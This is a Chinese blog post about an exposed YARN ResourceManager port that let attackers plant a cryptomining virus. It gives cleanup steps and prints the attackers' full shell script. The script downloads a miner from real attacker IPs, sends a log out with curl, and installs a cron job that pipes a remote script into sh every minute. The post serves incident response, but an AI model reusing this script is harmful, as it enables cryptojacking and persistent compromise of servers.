2. 程式人生 > >YARN Resourcemanager引入挖礦病毒的經歷

YARN Resourcemanager引入挖礦病毒的經歷

阿新 發佈:2019-01-27

原因

由於同事為了測試方便,把YARN RM的8088對外網開放了,導致攻擊者可以通過RM 的rest api直接可以提交應用。

解決參考部落格

我解決的辦法

  1. 關閉外網對映埠
  2. 刪除偽裝的可執行程式
  3. 檢視相應的程序 ps aux | grep /var/tmp/java ,然後殺掉程序
  4. 通過bin/yarn application -list 列出應用,檢視不是內部提交的應用,通過bin/yarn application -kill {appid} 殺掉程序
  5. crontab -e 刪除定時下載任務
  6. 後期維護 yarn使用許可權模組。

下面是遠端下載的shell指令碼 挖礦病毒的可執行指令碼

#!/bin/bash

pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
ps ax | grep "config.json -t" | grep -v grep | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
 

rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
DIR="/tmp"
if [ -a "/tmp/java" ]
then
    if [ -w "/tmp/java" ] && [ ! -d "/tmp/java" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /tmp/java | awk '{ print $1 }')
            echo $sum
            case $sum in
                183664
 
ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                    echo "Java OK"
                ;;
                *)
                    echo "Java wrong"
                    pkill -f w.conf
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/var/tmp" ]
    then
        DIR="/var/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/java" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
f2="185.222.210.59"

downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/java ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/java | awk '{ print $1 }')
        echo $sum
        case $sum in
            183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                echo "Java OK"
            ;;
            *)
                echo "Java wrong"
                sizeBefore=$(du $DIR/java)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                echo "" > $DIR/tmp.txt
                rm -rf $DIR/java
                download

                if [ -x "$(command -v md5sum)" ]
                then
                    sum=$(md5sum $DIR/java | awk '{ print $1 }')
                    echo $sum
                    case $sum in
                        183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                            echo "Java OK"
                            cp $DIR/java $DIR/ppc
                        ;;
                        *)
                            $WGET $DIR/java https://transfer.sh/6H16m/zzz > $DIR/tmp.txt 2>&1
                            echo "Java wrong"
                            sum=$(md5sum $DIR/java | awk '{ print $1 }')
                            case $sum in
                                183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                                    echo "Java OK"
                                    cp $DIR/java $DIR/ppc
                                ;;
                                *)
                                    echo "Java wrong2"
                                ;;
                            esac
                        ;;
                    esac
                else
                    echo "No md5sum"
                fi

                sumAfter=$(md5sum $DIR/java | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/java` >> $DIR/tmp.txt
                    curl -F "[email protected]$DIR/tmp.txt" http://$f2/re.php
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}

download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/ppc | awk '{ print $1 }')
        echo $sum
        case $sum in
            183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                echo "Java OK"
                cp $DIR/ppc $DIR/java
            ;;
            *)
                echo "Java wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
    f1=$(curl 185.222.210.59/g.php)
    if [ -z "$f1" ];
    then
        f1=$(wget -q -O - 185.222.210.59/g.php)
    fi

    if [ `getconf LONG_BIT` = "64" ]
    then
        $WGET $DIR/java http://$f1/xm64?$RANDOM
    else
        $WGET $DIR/java http://$f1/xm32?$RANDOM
    fi

    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/java | awk '{ print $1 }')
        echo $sum
        case $sum in
            183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                echo "Java OK"
                cp $DIR/java $DIR/ppc
            ;;
            *)
                echo "Java wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}


if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
    downloadIfNeed
    chmod +x $DIR/java
    $WGET $DIR/w.conf http://$f2/w.conf
    nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
    sleep 5
    rm -rf $DIR/w.conf
else
    echo "Running"
fi
if crontab -l | grep -q "185.222.210.59"
then
    echo "Cron exists"
else
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
    (crontab -l 2>/dev/null; echo "* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -

另一問題

如果發現程序不在,但是在安裝的時候,提示程序已經啟動,然後讓你關閉它。
這樣的問題是由於主機或者服務異常關機或停止,pid檔案沒有及時的被刪除或者沒有被標記過時,再次啟動的時候,服務程序會檢查pid檔案,如果存在,就不再啟動程序。
解決很簡單,找到相應的pid檔案,刪除掉,OK。另外,我還寫過關於/tmp 檔案存留的文章,最後不要把pid檔案放到/tmp目錄下,以免服務在啟動或者關閉的時候,發生異常。

相關推薦

YARN Resourcemanager引入病毒經歷

原因 由於同事為了測試方便,把YARN RM的8088對外網開放了,導致攻擊者可以通過RM 的rest api直接可以提交應用。 解決參考部落格 我解決的辦法 關閉外網對映埠 刪除偽裝的可執行程式 檢視相應的程序 ps aux | gre

hadoop yarn漏洞 8088埠進入病毒處理記錄

早上發現伺服器cpu使用異常  程序如圖所示 按照挖礦病毒的套路 肯定是定時任務不停地執行指令碼 遂檢視定時任務&

記一次手工清除病毒WannaMine V4.0的經歷

[作者:byeyear    郵箱:[email protected]    轉載請註明] 前兩天公司資訊保安處通知我的計算機存在永恆之藍漏洞並已被病毒感染,使用多方殺軟及專殺工具均無法有效清除,遂設法進行手工清除。 在被感染計算機上進行分析,對比被感染計算機和

服務器病毒的排查過程

挖礦今天同事反饋公司的某臺服務器遠程連接不上,登錄服務器查看後,發現CPU使用率居高不下。kill掉後,一分鐘有自動生成,整個排查思路如下:1、top 命令查看主機負載,確認可疑進程為bashd2、確認可疑進程嘗試殺掉,pkill bashd ,但發現一會就出現,懷疑有定時任務 3、 排查定時任務,定時任務有

阿裏雲服務器被病毒minerd入侵的解決方法

minerd 挖礦病毒 挖礦程序 木馬 早晨上班像往常一樣對服務器進行例行巡檢,發現一臺阿裏雲服務器的CPU的資源占用很高,到底是怎麽回事呢,趕緊用top命令查看了一下,發現是一個名為minerd的進程占用了很高的CPU資源,minerd之前聽說過,是一種挖礦病毒,沒有想到我負責的服務器會中這

記一次手動清理Linux病毒

pan fff 殺毒軟件 win10 ado top 根據 部門 enter 時間:2018年5月16日起因:某公司的運維人員在綠盟的IPS上監測到有挖"門羅幣"的惡意事件,受影響的機器為公司的大數據服務器以及其他Linux服務器。我也是趕鴨子上架第一次

Window應急響應(四):病毒

war 運行 focus 成功 關於 .exe 防範 pla min 0x00 前言 ? 隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高

解決病毒占用cpu以及誤刪 ld-linux-x86-64.so.2 文件的問題

轉移 第一條 根目錄 man bios 原本 光盤 防止 隱藏權限 上次已經被抓去挖礦了當了一次曠工了,本以為解決了,沒想到竟然死灰復燃。 這次占用cpu的依然是一個ld-linux的進程,kill掉之後同樣就查了關於test用戶的進程,果然,test用戶的進程有100+個

qW3xT.2,解決病毒

創建 exp tab -a 在服務器 守護 root 服務 tmp目錄 首先殺死進程: 1.首先,將 CPU 占滿的進程殺死 2.它有一個 守護進程 ps -aux|grep ddg 刪除文件: 1.進入/tmp文件夾下。發現qW3xT.2文件,刪除。 2.刪除/tmp目錄

Linux應急響應(三):病毒

命令 cront 展現 red dir resp ade 2-2 -h 0x00 前言 ? 隨著虛擬貨幣的瘋狂炒作,利用挖礦腳本來實現流量變現,使得挖礦病毒成為不法分子利用最為頻繁的攻擊方式。新的挖礦攻擊展現出了類似蠕蟲的行為,並結合了高級攻擊技術,以增加對目標服務器感染

病毒 qW3xT.2 最終解決方案

rop mod detail ios tail index $2 ashx hoc 轉自:https://blog.csdn.net/hgx13467479678/article/details/82347473 1,cpu 100%, 用top 查看cpu100

再一次被入侵之潛伏的病毒

今天是11月10號,正在忙著做雙十一凌晨流量衝擊的加固工作,登入xx伺服器的時候無意間發現CPU的使用率達到了70%,按常理分析,xx伺服器資源不會使用這麼高的,ps 排序一下程序資源使用,如下圖: 果然,有一個高負載的程序“-sh”,佔用CPU達到了599%, 據經驗分析,這絕逼又是

阿里雲病毒查殺

日常登入開發機。登入時發現很慢。心想肯定又又又中毒了(之前就經常各種挖礦攻擊) 登入後 top   -》  cpu 97%  但程序裡佔用高的最高也才1%呀(很是奇怪) 無奈又想把htop安上於是  yum install -y hto

病毒 解決思路 xmr

strong username 查看cpu ESS spider pool nobody join virt 基本上通過服務器挖礦只能利用cpu的性能了,所以 top查看cpu利用率,但是程序會影藏,讓你看不見,解決:刪除/usr/local/lib/libntp.so ,

記再一次清除病毒

前半個月出現的一次挖礦病毒,當時感覺處理了   ,過了兩週 不想又出現!!!噁心,鬱悶 總結幾點: 1.找到域名或者IP確認是不認識的,進行處理檢視定時任務 2.檢視定時任務 3.時刻注意/tmp檔案下的資料夾和檔案 4.出現這個問題的原因應該是redis免密造成的

Weblogic漏洞病毒解決方法

  1、 中病毒現象 此病毒基於Weblogic服務漏洞發起攻擊,造成系統宕機,cpu使用率高達400%以上。 2、 檢視病毒程序 Linux命令:root使用者執行top命令 ,會出現.data、.conn等程序。 Windows:檢視裝置管理器 也是出現.

linux 伺服器被植入ddgs、qW3xT.2病毒處理記錄

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.s

雲伺服器病毒處理之二 --------bin/x7程序開機自啟動

雲伺服器挖礦病毒處理之一 --------kworker和netfs異常 上面之一是我遇到的第一個問題,當時以為解決了,但發現其中有三臺機器只要啟動後就會有bin/x7程式,很是頑固。 重啟後就有問題,我查看了所有cron*的檔案顯示都正常的,然後再看了一下/etc/init.d裡面的檔

雲伺服器病毒處理之一 --------kworker和netfs異常

最近這幾天公司有個專案組的機器中毒了,而且很嚴重,看了一下中毒日期發現是10月18號就被入侵了。前段時間就有問題他們沒被重視,這幾填記憶體佔用太恐怖了特別是在夜晚自動啟動,程序定點在0點到8點啟動 程序檢視: 使用clamscn進行病毒掃描(具體Clamscn的具體介紹可以使

XMR惡意病毒清除

中了XMR惡意挖礦病毒,在全盤查詢js檔案,並插入網頁挖礦JS指令碼document.write(‘<script src=”http://t.cn/EvlonFh“></script><script>OMINEId(“e02cf4ce91